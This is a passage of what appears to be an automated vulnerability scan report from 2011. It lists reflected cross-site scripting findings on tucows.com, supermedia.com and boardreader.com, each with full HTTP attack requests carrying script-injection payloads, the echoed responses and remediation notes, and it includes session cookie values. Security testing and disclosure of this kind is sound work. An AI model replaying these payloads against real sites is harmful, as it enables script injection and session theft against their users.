GET /includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:29 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32153
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49de9"-alert(1)-"04a15e87fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:45 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a9a"-alert(1)-"237aaaa614c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:55 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f64"-alert(1)-"4bb4721a55e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:57:07 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86915"-alert(1)-"a2383cc0931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:23 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942cd"-alert(1)-"ffd8d4c4a27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:31 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17188"-alert(1)-"4251e1c163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:46 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac0c"-alert(1)-"7fb6f8e43f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:55 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:38 GMT Server: Unspecified Content-Length: 101 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/
3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1f"><script>alert(1)</script>3606575b7cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&b2e1f"><script>alert(1)</script>3606575b7cc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response (redirected)
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:49 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/%7BsearchTerms%7D.html?source=opensearch&b2e1f"><script>alert(1)</script>3606575b7cc=1&p=20&format=RSS2.0" /> ...[SNIP]...
3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d10e'><script>alert(1)</script>2f96e732bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&2d10e'><script>alert(1)</script>2f96e732bb6=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response (redirected)
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:53:00 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <input type=hidden name='2d10e'><script>alert(1)</script>2f96e732bb6' value="1"> ...[SNIP]...
3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/my/signup.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9f2"><script>alert(1)</script>671f469cc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:38 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <form name="mylogin_" action="/my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1" method="POST"> ...[SNIP]...
3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/articles/-/-/7.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ec4"><script>alert(1)</script>e3800dfbbbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/articles/-/-/7.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:07 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Toilet%2Bpaper%2Borientation.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1" title="Search discussions for item "Toilet paper orientation""> ...[SNIP]...
3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/films/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef06b"><script>alert(1)</script>06db0769bba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
